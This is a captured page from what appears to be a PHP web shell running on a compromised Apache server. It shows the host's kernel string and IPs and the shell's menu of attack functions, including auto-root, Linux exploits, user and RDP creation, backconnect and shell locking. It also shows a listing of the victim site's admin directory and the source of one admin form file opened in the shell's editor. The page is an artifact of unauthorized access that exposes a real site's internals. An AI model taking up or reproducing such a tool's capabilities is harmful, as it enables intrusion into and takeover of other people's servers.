Linux ip-172-26-5-244 6.1.0-28-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64
Apache
: 172.26.5.244 | : 216.73.216.21
Cant Read [ /etc/named.conf ]
8.3.14
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
opt /
bitnami /
apache /
htdocs /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
ajax
[ DIR ]
drwxr-xr-x
app-assets
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
module
[ DIR ]
drwxr-xr-x
PhpXlsxGenerator.php
54.22
KB
-rw-r--r--
ad_contact_details.php
14.65
KB
-rw-r--r--
add_360_category.php
4.56
KB
-rw-r--r--
add_360_products.php
7.11
KB
-rw-r--r--
add_application.php
5.06
KB
-rw-r--r--
add_blogs.php
8.72
KB
-rw-r--r--
add_brands.php
6.56
KB
-rw-r--r--
add_catalogues.php
7.02
KB
-rw-r--r--
add_collections.php
12.59
KB
-rw-r--r--
add_division.php
8.29
KB
-rw-r--r--
add_effects.php
4.95
KB
-rw-r--r--
add_events.php
10.41
KB
-rw-r--r--
add_gallery.php
8.79
KB
-rw-r--r--
add_main_event.php
8.63
KB
-rw-r--r--
add_multiple_products.php
10.54
KB
-rw-r--r--
add_products.php
28.81
KB
-rw-r--r--
add_series.php
7.45
KB
-rw-r--r--
add_thickness.php
6.63
KB
-rw-r--r--
all_360_category.php
9.63
KB
-rw-r--r--
all_360_products.php
7.63
KB
-rw-r--r--
all_application.php
10.43
KB
-rw-r--r--
all_blogs.php
10.91
KB
-rw-r--r--
all_brands.php
7.07
KB
-rw-r--r--
all_catalogues.php
10.05
KB
-rw-r--r--
all_collections.php
7.01
KB
-rw-r--r--
all_division.php
7.38
KB
-rw-r--r--
all_effects.php
10.26
KB
-rw-r--r--
all_events.php
10.29
KB
-rw-r--r--
all_gallery.php
10.48
KB
-rw-r--r--
all_main_events.php
10
KB
-rw-r--r--
all_products.php
18.18
KB
-rw-r--r--
all_products_new.php
13.4
KB
-rw-r--r--
all_series.php
10.23
KB
-rw-r--r--
all_sub_collections.php
7.4
KB
-rw-r--r--
all_sub_division.php
7.76
KB
-rw-r--r--
all_thickness.php
7.64
KB
-rw-r--r--
divisions.php
486
B
-rw-r--r--
edit_360_category.php
5.04
KB
-rw-r--r--
edit_360_products.php
7.9
KB
-rw-r--r--
edit_application.php
5.88
KB
-rw-r--r--
edit_blogs.php
9.46
KB
-rw-r--r--
edit_brands.php
7.4
KB
-rw-r--r--
edit_catalogue.php
7.95
KB
-rw-r--r--
edit_collections.php
16.95
KB
-rw-r--r--
edit_gallery.php
8.85
KB
-rw-r--r--
edit_main_events.php
9.79
KB
-rw-r--r--
edit_product.php
35.18
KB
-rw-r--r--
edit_series.php
8.98
KB
-rw-r--r--
edit_sub_collections.php
17.26
KB
-rw-r--r--
edit_sub_event.php
10.73
KB
-rw-r--r--
edit_thickness.php
7.58
KB
-rw-r--r--
export_excel.php
4.21
KB
-rw-r--r--
functions.php
523
B
-rw-r--r--
index.php
3.77
KB
-rw-r--r--
login.php
6.83
KB
-rw-r--r--
logout.php
92
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : add_series.php
<?php include("include/header.php"); include("divisions.php"); ?> <div class="main-panel"> <!-- BEGIN : Main Content--> <div class="main-content"> <div class="content-wrapper"><div class="row"> <div class="col-sm-12"> <div class="content-header">Series Management</div> </div> </div> <!-- Input Validation start --> <section class="input-validation"> <div class="row"> <div class="col-md-8"> <div class="card"> <?php if($_SERVER['QUERY_STRING'] == "success") { echo '<div class="alert alert-primary mb-2" role="alert"> <strong>Success!</strong> New Series has been added.</div>'; } if($_SERVER['QUERY_STRING'] == "err") { echo '<div class="alert alert-warning mb-2" role="alert"> <strong>Warning!</strong> Please check details. </div>'; } ?> <div class="card-header"> <h4 class="card-title" id="basic-layout-form">Add Series</h4> </div> <div class="card-content"> <form name="myform" action="#" method="POST" onsubmit="return false;"> <div class="px-3"> <div class="form-body"> <br> <div class="row"> <div class="col-md-6"> <div class="form-group"> <label for="collection_id">Select Collection</label> <select id="collection_id" name="collection_id" class="form-control"> <option value="0" selected="" disabled="">-- Select Collection --</option> <?php $count=1; $sel_query="Select * from tbl_collection where parent_id = 0 and visibility = 1"; $result = mysqli_query($conn,$sel_query); while($row= mysqli_fetch_assoc($result)) { ?> <option value="<?= $row['collection_id']; ?>"><?= $row['collection_name']; ?></option> <?php } ?> </select> </div> </div> <div class="col-md-6"> <div class="form-group"> <label for="size_id">Select Collection</label> <select id="size_id" name="size_id" class="form-control"> </select> </div> </div> </div> <div class="row"> <div class="col-md-6"> <div class="form-group"> <label for="series_name">Series Name</label> <input type="text" class="form-control" name="series_name" id="series_name" autocomplete="off"> </div> </div> <div class="col-md-6"> <div class="form-group"> <label for="series_slug">Series Slug Name</label> <input type="text" class="form-control" name="series_slug" id="series_slug" autocomplete="off" disabled> </div> </div> </div> <div class="row"> <div class="col-md-6"> <div class="form-group"> <label>Select File</label> <input type="file" class="form-control-file" name="series_image" id="series_image"> </div> </div> </div> <div class="form-actions"> <button type="button" id="add_effects" class="btn btn-raised btn-raised btn-primary"> <i class="fa fa-check-square-o"></i> Save </button> <button type="button" class="btn btn-raised btn-raised btn-warning mr-1"> <i class="ft-x"></i> Cancel </button> </div> </div> </div> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.min.js"></script> <script> $("#add_effects").click(function(){ var err_txt = 0; if(err_txt==0) { $("#overLay").show(); var m_data = new FormData(); m_data.append( 'collection_id', $( "#collection_id option:selected" ).val()); m_data.append( 'size_id', $( "#size_id option:selected" ).val()); m_data.append( 'series_name', $('input[name=series_name]').val()); m_data.append( 'series_slug', $('input[name=series_slug]').val()); m_data.append( 'series_image', $('input[name=series_image]')[0].files[0]); $.ajax({ url: 'ajax/aj_add_series.php', type:'POST', data: m_data, processData: false, contentType: false, success: function(res) { $("#spnmsg").html(res); $("#overLay").hide(); if(res == "success") { location.href = "add_series.php?success"; } if(res == "err") { location.href = "add_series.php?err"; } } }); } }); </script> </form> </div> </div> </div> </div> </div> </section> <!-- Input Validation end --> </div> </div> <!-- END : End Main Content--> <?php include("include/footer.php"); ?> <script type="text/javascript"> $(document).ready(function() { $("#collection_id").change(function() { var surface_id = $(this).val(); //alert(surface_id); if(surface_id != "") { $.ajax({ url:"ajax/aj_get_size.php", data:{s_id:surface_id}, type:'POST', success:function(response) { var resp = $.trim(response); $("#size_id").html(resp); } }); } else { $("#size_id").html("<option value=''>--select Collection--</option>"); } }); }); $(document).ready(function() { $("#size_id").change(function() { var finish_id = $(this).val(); //alert(finish_id); if(finish_id != "") { $.ajax({ url:"ajax/aj_get_finish.php", data:{f_id:finish_id}, type:'POST', success:function(response) { var resp = $.trim(response); $("#finish_id").html(resp); } }); } else { $("#finish_id").html("<option value=''>--select Collection--</option>"); } }); }); $( document ).ready(function() { $('#series_name').keyup(function() { var oneValue = $("[name='series_name']").val().replace(/ /g,'-'); $('#series_slug').val(oneValue); }); }); </script>
Close